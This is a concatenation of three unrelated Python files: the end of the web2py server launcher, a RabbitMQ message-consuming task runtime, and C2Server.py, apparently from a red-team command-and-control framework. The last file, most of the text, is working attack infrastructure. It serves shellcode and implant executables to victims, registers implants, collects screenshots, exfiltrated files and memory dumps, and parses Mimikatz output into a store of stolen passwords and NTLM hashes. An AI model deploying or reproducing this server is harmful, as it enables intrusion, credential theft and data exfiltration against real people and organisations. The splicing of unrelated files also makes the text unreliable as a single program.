""" Stops web2py server """
self.button_start.configure(state='normal')
self.button_stop.configure(state='disabled')
self.password.configure(state='normal')
[ip.configure(state='normal') for ip in self.ips.values()]
self.port_number.configure(state='normal')
self.server.stop()
if self.tb:
self.tb.SetServerStopped()
def update_canvas(self):
""" Updates canvas """
httplog = os.path.join(self.options.folder, self.options.log_filename)
try:
t1 = os.path.getsize(httplog)
except:
self.canvas.after(1000, self.update_canvas)
return
try:
fp = open(httplog, 'r')
fp.seek(self.t0)
data = fp.read(t1 - self.t0)
fp.close()
value = self.p0[1:] + [10 + 90.0 / math.sqrt(1 + data.count('\n'))]
self.p0 = value
for i in xrange(len(self.p0) - 1):
c = self.canvas.coords(self.q0[i])
self.canvas.coords(self.q0[i],
(c[0],
self.p0[i],
c[2],
self.p0[i + 1]))
self.t0 = t1
except BaseException:
self.t0 = time.time()
self.t0 = t1
self.p0 = [100] * 400
self.q0 = [self.canvas.create_line(i, 100, i + 1, 100,
fill='green') for i in xrange(len(self.p0) - 1)]
self.canvas.after(1000, self.update_canvas)
def check_existent_app(options, appname):
if os.path.isdir(os.path.join(options.folder, 'applications', appname)):
return True
def get_code_for_scheduler(app_groups, options):
app = app_groups[0]
if not check_existent_app(options, app):
print("Application '%s' doesn't exist, skipping" % app)
return None, None
code = 'from gluon.globals import current;'
if len(app_groups) > 1:
code += "current._scheduler.group_names=['%s'];" % "','".join(
app_groups[1:])
code += "current._scheduler.loop()"
return app, code
def start_schedulers(options):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for Python 2.6+\n')
return
logging.getLogger().setLevel(options.log_level)
apps = [ag.split(':') for ag in options.schedulers]
if not options.with_scheduler and len(apps) == 1:
app, code = get_code_for_scheduler(apps[0], options)
if not app:
return
print('starting single-scheduler for "%s"...' % app)
run(app, True, True, None, False, code, False, True)
return
# Work around OS X problem: http://bugs.python.org/issue9405
if PY2:
import urllib
else:
import urllib.request as urllib
urllib.getproxies()
processes = []
for app_groups in apps:
app, code = get_code_for_scheduler(app_groups, options)
if not app:
continue
print('starting scheduler for "%s"...' % app)
args = (app, True, True, None, False, code, False, True)
p = Process(target=run, args=args)
processes.append(p)
print("Currently running %s scheduler processes" % (len(processes)))
p.start()
##to avoid bashing the db at the same time
time.sleep(0.7)
print("Processes started")
for p in processes:
try:
p.join()
except (KeyboardInterrupt, SystemExit):
print("Processes stopped")
except:
p.terminate()
p.join()
def start():
""" Starts server and other services """
# get command line arguments
options = console(version=ProgramVersion)
if options.gae:
# write app.yaml, gaehandler.py, and exit
if not os.path.exists('app.yaml'):
name = options.gae
# for backward compatibility
if name == 'configure':
if PY2: input = raw_input
name = input("Your GAE app name: ")
content = open(os.path.join('examples', 'app.example.yaml'), 'rb').read()
open('app.yaml', 'wb').write(content.replace("yourappname", name))
else:
print("app.yaml alreday exists in the web2py folder")
if not os.path.exists('gaehandler.py'):
content = open(os.path.join('handlers', 'gaehandler.py'), 'rb').read()
open('gaehandler.py', 'wb').write(content)
else:
print("gaehandler.py alreday exists in the web2py folder")
return
logger = logging.getLogger("web2py")
logger.setLevel(options.log_level)
# on new installation build the scaffolding app
create_welcome_w2p()
if options.run_system_tests:
# run system test and exit
run_system_tests(options)
if options.quiet:
# to prevent writes on stdout set a null stream
class NullFile(object):
def write(self, x):
pass
sys.stdout = NullFile()
# but still has to mute existing loggers, to do that iterate
# over all existing loggers (root logger included) and remove
# all attached logging.StreamHandler instances currently
# streaming on sys.stdout or sys.stderr
loggers = [logging.getLogger()]
loggers.extend(logging.Logger.manager.loggerDict.values())
for l in loggers:
if isinstance(l, logging.PlaceHolder): continue
for h in l.handlers[:]:
if isinstance(h, logging.StreamHandler) and \
h.stream in (sys.stdout, sys.stderr):
l.removeHandler(h)
# NOTE: stderr.write() is still working
if not options.no_banner:
# banner
print(ProgramName)
print(ProgramAuthor)
print(ProgramVersion)
from pydal.drivers import DRIVERS
print('Database drivers available: %s' % ', '.join(DRIVERS))
if options.run_doctests:
# run doctests and exit
test(options.run_doctests, verbose=options.verbose)
return
if options.shell:
# run interactive shell and exit
sys.argv = [options.run or ''] + options.args
run(options.shell, plain=options.plain, bpython=options.bpython,
import_models=options.import_models, startfile=options.run,
cron_job=options.cron_job)
return
if options.cron_run:
# run cron (extcron) and exit
logger.debug('Starting extcron...')
global_settings.web2py_crontype = 'external'
extcron = newcron.extcron(options.folder, apps=options.crontabs)
extcron.start()
extcron.join()
return
if not options.with_scheduler and options.schedulers:
# run schedulers and exit
try:
start_schedulers(options)
except KeyboardInterrupt:
pass
return
if options.with_cron:
if options.soft_cron:
print('Using cron software emulation (but this is not very efficient)')
global_settings.web2py_crontype = 'soft'
else:
# start hardcron thread
logger.debug('Starting hardcron...')
global_settings.web2py_crontype = 'hard'
newcron.hardcron(options.folder, apps=options.crontabs).start()
# if no password provided and have Tk library start GUI (when not
# explicitly disabled), we also need a GUI to put in taskbar (system tray)
# when requested
root = None
if (not options.no_gui and options.password == '<ask>') or options.taskbar:
try:
if PY2:
import Tkinter as tkinter
else:
import tkinter
root = tkinter.Tk()
except (ImportError, OSError):
logger.warn(
'GUI not available because Tk library is not installed')
options.no_gui = True
except:
logger.exception('cannot get Tk root window, GUI disabled')
options.no_gui = True
if root:
# run GUI and exit
root.focus_force()
# Mac OS X - make the GUI window rise to the top
if os.path.exists("/usr/bin/osascript"):
applescript = """
tell application "System Events"
set proc to first process whose unix id is %d
set frontmost of proc to true
end tell
""" % (os.getpid())
os.system("/usr/bin/osascript -e '%s'" % applescript)
# web2pyDialog takes care of schedulers
master = web2pyDialog(root, options)
signal.signal(signal.SIGTERM, lambda a, b: master.quit())
try:
root.mainloop()
except:
master.quit()
sys.exit()
spt = None
if options.with_scheduler and options.schedulers:
# start schedulers in a separate thread
spt = threading.Thread(target=start_schedulers, args=(options,))
spt.start()
# start server
if options.password == '<ask>':
options.password = getpass.getpass('choose a password:')
if not options.password and not options.no_banner:
print('no password, disable admin interface')
# Use first interface IP and port if interfaces specified, since the
# interfaces option overrides the IP (and related) options.
if not options.interfaces:
ip = options.ip
port = options.port
else:
first_if = options.interfaces[0]
ip = first_if[0]
port = first_if[1]
if options.server_key and options.server_cert:
proto = 'https'
else:
proto = 'http'
url = get_url(ip, proto=proto, port=port)
if not options.no_banner:
message = '\nplease visit:\n\t%s\n'
if sys.platform.startswith('win'):
message += 'use "taskkill /f /pid %i" to shutdown the web2py server\n\n'
else:
message += 'use "kill -SIGTERM %i" to shutdown the web2py server\n\n'
print(message % (url, os.getpid()))
# enhance linecache.getline (used by debugger) to look at the source file
# if the line was not found (under py2exe & when file was modified)
import linecache
py2exe_getline = linecache.getline
def getline(filename, lineno, *args, **kwargs):
line = py2exe_getline(filename, lineno, *args, **kwargs)
if not line:
try:
with open(filename, "rb") as f:
for i, line in enumerate(f):
line = line.decode('utf-8')
if lineno == i + 1:
break
else:
line = ''
except (IOError, OSError):
line = ''
return line
linecache.getline = getline
server = main.HttpServer(ip=ip,
port=port,
password=options.password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.server_cert,
ssl_private_key=options.server_key,
ssl_ca_certificate=options.ca_cert,
min_threads=options.min_threads,
max_threads=options.max_threads,
server_name=options.server_name,
request_queue_size=options.request_queue_size,
timeout=options.timeout,
socket_timeout=options.socket_timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
try:
server.start()
except KeyboardInterrupt:
server.stop()
if spt is not None:
try:
spt.join()
except:
logger.exception('error terminating schedulers')
pass
logging.shutdown()
|
TaskRuntime_async.py
|
import thread
import threading
import time
import task
import json
import logging
import pika
import traceback
import AsyncConsumer
import Queue
class Timer(object):
def __init__(self, verbose=False):
self.verbose = verbose
def __enter__(self):
self.start = time.time()
return self
def __exit__(self, *args):
self.end = time.time()
self.secs = self.end - self.start
self.msecs = self.secs * 1000 # millisecs
if self.verbose:
print 'elapsed time: %f ms' % self.msecs
class TaskRuntime:
def init(self, runtime_config, task_config):
self.config = runtime_config
self.task = task.Task();
self.task.init(task_config);
connection = pika.BlockingConnection(pika.ConnectionParameters(
host = self.config['broker_host'],
virtual_host = self.config['broker_vhost'],
credentials = pika.PlainCredentials(self.config['broker_username'],
self.config['broker_password'])
))
channel = connection.channel()
result = channel.queue_declare(queue = self.config['subscript_queue'],
durable=True, auto_delete=False)
channel.basic_qos(prefetch_count=10)
qname = result.method.queue
channel.queue_bind(exchange=self.config['broker_exchange'],
queue=qname, routing_key=self.config['subscript_topic'])
self.config['subscript_queue'] = qname
self.channel = channel
self.stat = {
'messages' : 0,
'messages_success' : 0,
'messages_failed' : 0
}
def stop(self, reason):
dissubscript()
self.task.stop()
if not running:
exit(0)
def start_consuming(self):
self.consumer.run()
def start(self):
#channel = self.channel
#channel.basic_consume(self.on_message, queue = self.config['subscript_queue'], no_ack=False)
self.consumer = AsyncConsumer.AsyncConsumer('amqp://guest:guest@localhost:5672/%2F','quotation_daily', 'auction', '#')
import threading
thread = threading.Thread(target = self.start_consuming)
thread.start()
try:
#channel.start_consuming()
starttime = time.time()
message_count = 0
start_message_count = message_count
while True:
try:
msg = self.consumer.msg_queue.get(False)
except Queue.Empty:
continue
if msg is not None:
message_count += 1
self.on_message2(msg)
else:
print "No data available"
now = time.time()
if now - starttime > 5:
timespan = now - starttime
print "%s msgs processed, avg time %s"%(message_count - start_message_count, (message_count - start_message_count)/timespan)
starttime = now
start_message_count = message_count
except KeyboardInterrupt:
#channel.stop_consuming()
#channel.cancel()
self.consumer.stop()
channel.connection.close()
def on_message2(self, msg):
header = msg['headers']
data = json.loads(msg['body'])
ret = self.task.run(header, data)
if ret:
self.consumer.ack_queue.put(msg['delivery_tag'])
def on_message(self, channel, method_frame, header_frame, body):
running = True
if header_frame.headers is None:
header = {}
else:
header = header_frame.headers.copy()
header['routing_key'] = method_frame.routing_key
delivery_tag = method_frame.delivery_tag
data = json.loads(body)
with Timer(False) as t:
try:
ret = self.task.run(header, data)
if ret:
self.stat['messages'] += 1
self.stat['messages_success'] += 1
#logging.info('messages : %s, success : %d, failed : %d', self.stat['messages'],
# self.stat['messages_success'], self.stat['messages_failed'])
else:
self.stat['messages'] += 1
self.stat['messages_failed'] += 1
logging.info('messages : %s, success : %d, failed : %d', self.stat['messages'],
self.stat['messages_success'], self.stat['messages_failed'])
except Exception as err:
logging.error(err)
self.stat['messages'] += 1
self.stat['messages_failed'] += 1
logging.info('messages : %s, success : %d, failed : %d', self.stat['messages'],
self.stat['messages_success'], self.stat['messages_failed'])
channel.basic_nack(delivery_tag=delivery_tag)
tb = traceback.format_exc()
print tb
raise SystemExit("I need arguments!")
else:
channel.basic_ack(delivery_tag=delivery_tag)
running = False;
def log(self, level, message):
#send log info to server
pass
def send_message(self, topic, header, data):
#create an AMQP message and send to broker
pass
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s',
level=logging.INFO)
runtime = TaskRuntime()
with open('runtime.config', 'r') as f:
runtime_config = json.loads(f.read())
with open('task.config', 'r') as f:
task_config = json.loads(f.read())
runtime.init(runtime_config, task_config)
runtime.start()
|
C2Server.py
|
#!/usr/bin/env python3
import os, sys, datetime, time, base64, logging, signal, re, ssl, traceback, threading
from urllib.request import urlopen, Request
from urllib.error import HTTPError, URLError
from Implant import Implant
from Tasks import newTask
from Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days
from Colours import Colours
from DB import select_item, get_implants_all, update_implant_lastseen, update_task, get_cmd_from_task_id, get_c2server_all, get_sharpurls
from DB import update_item, get_task_owner, get_newimplanturl, initializedb, setupserver, new_urldetails, get_baseenckey, insert_cred, get_c2_messages
from Payloads import Payloads
from Config import ROOTDIR, ServerHeader, PayloadsDirectory, HTTPResponse, DownloadsDirectory, Database, HostnameIP, SocksHost
from Config import QuickCommand, KillDate, DefaultSleep, DomainFrontHeader, ServerPort, urlConfig, HOST_NAME, PORT_NUMBER
from Config import DownloadURI, Sounds, APIKEY, MobileNumber, URLS, SocksURLS, Insecure, UserAgent, Referrer, APIToken
from Config import APIUser, EnableNotifications
from Cert import create_self_signed_cert
from Help import logopic
from Utils import validate_sleep_time, randomuri, gen_key
from socketserver import ThreadingMixIn
from http.server import BaseHTTPRequestHandler, HTTPServer
def process_mimikatz(lines):
# code source https://github.com/stufus/parse-mimikatz-log/blob/master/pml.py
main_count = 0
current = {}
for line in lines.split('\n'):
main_count += 1
val = re.match(r'^\s*\*\s+Username\s+:\s+(.+)\s*$', line.strip())
if val is not None:
current = {}
current['Username'] = val.group(1).strip()
if current['Username'] == '(null)':
current['Username'] = None
continue
val = re.match(r'^\s*\*\s+Domain\s+:\s+(.+)\s*$', line.strip())
if val is not None:
current['Domain'] = val.group(1).strip()
if current['Domain'] == '(null)':
current['Domain'] = None
continue
val = re.match(r'^\s*\*\s+(NTLM|Password)\s+:\s+(.+)\s*$', line.strip())
if val is not None and "Username" in current and "Domain" in current:
if val.group(2).count(" ") < 10:
current[val.group(1).strip()] = val.group(2)
if val.group(1) == "Password":
if val.group(2) == '(null)':
continue
insert_cred(current['Domain'], current['Username'], current['Password'], None)
elif val.group(1) == "NTLM":
if val.group(2) == '(null)':
continue
insert_cred(current['Domain'], current['Username'], None, current['NTLM'])
class MyHandler(BaseHTTPRequestHandler):
def signal_handler(signal, frame):
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
def log_message(self, format, *args):
try:
useragent = str(self.headers['user-agent'])
except Exception:
useragent = "None"
open("%swebserver.log" % ROOTDIR, "a").write("%s - [%s] %s %s\n" %
(self.address_string(), self.log_date_time_string(), format % args, useragent))
def do_HEAD(s):
"""Respond to a HEAD request."""
s.server_version = ServerHeader
s.sys_version = ""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_OPTIONS(s):
"""Respond to a HEAD request."""
s.server_version = ServerHeader
s.sys_version = ""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_PUT(s):
"""Respond to a PUT request."""
s.server_version = ServerHeader
s.sys_version = ""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_GET(s):
"""Respond to a GET request."""
logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(s.path), str(s.headers))
new_implant_url = get_newimplanturl()
s.cookieHeader = s.headers.get('Cookie')
QuickCommandURI = select_item("QuickCommand", "C2Server")
UriPath = str(s.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
s.server_version = ServerHeader
s.sys_version = ""
if not s.cookieHeader:
s.cookieHeader = "NONE"
# implant gets a new task
new_task = newTask(s.path)
if new_task:
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(new_task)
elif [ele for ele in sharplist if(ele in UriPath)]:
try:
open("%swebserver.log" % ROOTDIR, "a").write("%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (s.address_string(), s.log_date_time_string(), SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath), headers={'Accept-Encoding': 'gzip', 'Cookie': '%s' % s.cookieHeader, 'User-Agent': UserAgent})
res = urlopen(r)
sharpout = res.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.send_header("Connection", "close")
s.send_header("Content-Length", len(sharpout))
s.end_headers()
if (len(sharpout) > 0):
s.wfile.write(sharpout)
except HTTPError as e:
s.send_response(e.code)
s.send_header("Content-type", "text/html")
s.send_header("Connection", "close")
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
open("%swebserver.log" % ROOTDIR, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
print(Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes(HTTPResponse, "utf-8"))
elif ("%s_bs" % QuickCommandURI) in s.path:
filename = "%spayload.bat" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%s_rg" % QuickCommandURI) in s.path:
filename = "%srg_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%ss/86/portal" % QuickCommandURI) in s.path:
filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%ss/64/portal" % QuickCommandURI) in s.path:
filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%sp/86/portal" % QuickCommandURI) in s.path:
filename = "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%sp/64/portal" % QuickCommandURI) in s.path:
filename = "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%s_cs" % QuickCommandURI) in s.path:
filename = "%scs_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%s_py" % QuickCommandURI) in s.path:
filename = "%saes.py" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = "a" + "".join("{:02x}".format(c) for c in content)
s.send_response(200)
s.send_header("Content-type", "text/plain")
s.end_headers()
s.wfile.write(bytes(content, "utf-8"))
elif ("%s_ex86" % QuickCommandURI) in s.path:
filename = "%sPosh32.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "application/x-msdownload")
s.end_headers()
s.wfile.write(content)
elif ("%s_ex64" % QuickCommandURI) in s.path:
filename = "%sPosh64.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "application/x-msdownload")
s.end_headers()
s.wfile.write(content)
# register new implant
elif new_implant_url in s.path and s.cookieHeader.startswith("SessionID"):
implant_type = "PS"
if s.path == ("%s?p" % new_implant_url):
implant_type = "PS Proxy"
if s.path == ("%s?d" % new_implant_url):
implant_type = "PS Daisy"
if s.path == ("%s?m" % new_implant_url):
implant_type = "Python"
if s.path == ("%s?d?m" % new_implant_url):
implant_type = "Python Daisy"
if s.path == ("%s?p?m" % new_implant_url):
implant_type = "Python Proxy"
if s.path == ("%s?c" % new_implant_url):
implant_type = "C#"
if s.path == ("%s?d?c" % new_implant_url):
implant_type = "C# Daisy"
if s.path == ("%s?p?c" % new_implant_url):
implant_type = "C# Proxy"
if implant_type.startswith("C#"):
cookieVal = (s.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1])
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.SharpCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
elif implant_type.startswith("Python"):
cookieVal = (s.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1])
User, Domain, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.PythonCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
else:
try:
cookieVal = (s.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY.encode("utf-8"), cookieVal)
decCookie = str(decCookie)
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1])
if "\\" in str(User):
User = User[str(User).index('\\') + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
newImplant.autoruns()
responseVal = encrypt(KEY, newImplant.PSCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
except Exception as e:
print("Decryption error: %s" % e)
traceback.print_exc()
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes(HTTPResponse, "utf-8"))
else:
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
HTTPResponsePage = select_item("HTTPResponse", "C2Server")
if HTTPResponsePage:
s.wfile.write(bytes(HTTPResponsePage, "utf-8"))
else:
s.wfile.write(bytes(HTTPResponse, "utf-8"))
def do_POST(s):
"""Respond to a POST request."""
try:
s.server_version = ServerHeader
s.sys_version = ""
try:
content_length = int(s.headers['Content-Length'])
except:
content_length = 0
s.cookieHeader = s.headers.get('Cookie')
try:
cookieVal = (s.cookieHeader).replace("SessionID=", "")
except:
cookieVal = ""
post_data = s.rfile.read(content_length)
logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", str(s.path), str(s.headers), post_data)
now = datetime.now()
result = get_implants_all()
for i in result:
implantID = i[0]
RandomURI = i[1]
Hostname = i[3]
encKey = i[5]
Domain = i[11]
User = i[2]
if RandomURI in s.path and cookieVal:
update_implant_lastseen(now.strftime("%d/%m/%Y %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
executedCmd = get_cmd_from_task_id(taskId)
task_owner = get_task_owner(taskId)
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%d/%m/%Y %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%d/%m/%Y %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if "loadmodule" in executedCmd:
print("Module loaded successfully")
update_task(taskId, "Module loaded successfully")
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = i[3] + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")):
update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-files ", "")
filename = filename.replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.replace("\\", "/")
directory, filename = filename.rsplit('/', 1)
filename = filename.rstrip('\x00')
original_filename = filename.strip()
if not original_filename:
directory = directory.rstrip('\x00')
directory = directory.replace("/", "_").replace("\\", "_").strip()
original_filename = directory
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
if (chunkNumber == "00001") and os.path.isfile('%sdownloads/%s' % (ROOTDIR, filename)):
counter = 1
while(os.path.isfile('%sdownloads/%s' % (ROOTDIR, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%sdownloads/%s' % (ROOTDIR, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%sdownloads/%s' % (ROOTDIR, filename))):
# First find the 'next' file would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%sdownloads/%s' % (ROOTDIR, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]"):
update_task(taskId, rawoutput)
print(rawoutput)
else:
dumppath = "%sSafetyDump-Task-%s.bin" % (DownloadsDirectory, taskIdStr)
open(dumppath, 'wb').write(base64.b64decode(rawoutput))
message = "Dump written to: %s" % dumppath
update_task(taskId, message)
print(message)
elif (executedCmd.lower().startswith("run-exe safetykatz") or executedCmd.lower().startswith("invoke-mimikatz") or executedCmd.lower().startswith("pbind-command")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
process_mimikatz(outputParsed)
update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
except Exception as e:
print(Colours.RED + "Unknown error!" + Colours.END)
print(e)
traceback.print_exc()
finally:
try:
UriPath = str(s.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
if [ele for ele in sharplist if(ele in UriPath)]:
try:
open("%swebserver.log" % ROOTDIR, "a").write("[+] Making POST connection to SharpSocks %s%s\r\n" % (SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath), headers={'Cookie': '%s' % s.cookieHeader, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36'})
res = urlopen(r, post_data)
sharpout = res.read()
s.send_response(res.getcode())
s.send_header("Content-type", "text/html")
s.send_header("Content-Length", len(sharpout))
s.end_headers()
if (len(sharpout) > 0):
s.wfile.write(sharpout)
except URLError as e:
try:
s.send_response(res.getcode())
except:
s.send_response(500)
s.send_header("Content-type", "text/html")
try:
s.send_header("Content-Length", len(sharpout))
except:
s.send_header("Content-Length", 0)
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] URLError with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
except HTTPError as e:
try:
s.send_response(res.getcode())
except:
s.send_response(500)
s.send_header("Content-type", "text/html")
try:
s.send_header("Content-Length", len(sharpout))
except:
s.send_header("Content-Length", 0)
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] HTTPError with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
s.send_response(res.getcode())
s.send_header("Content-type", "text/html")
s.send_header("Content-Length", len(sharpout))
s.end_headers()
